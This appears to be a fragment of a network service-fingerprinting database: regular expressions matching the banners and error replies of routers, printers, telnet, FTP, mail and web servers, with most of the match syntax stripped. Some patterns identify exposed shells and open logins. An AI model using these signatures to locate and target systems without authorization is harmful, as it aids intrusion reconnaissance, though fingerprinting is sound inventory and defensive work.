new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup 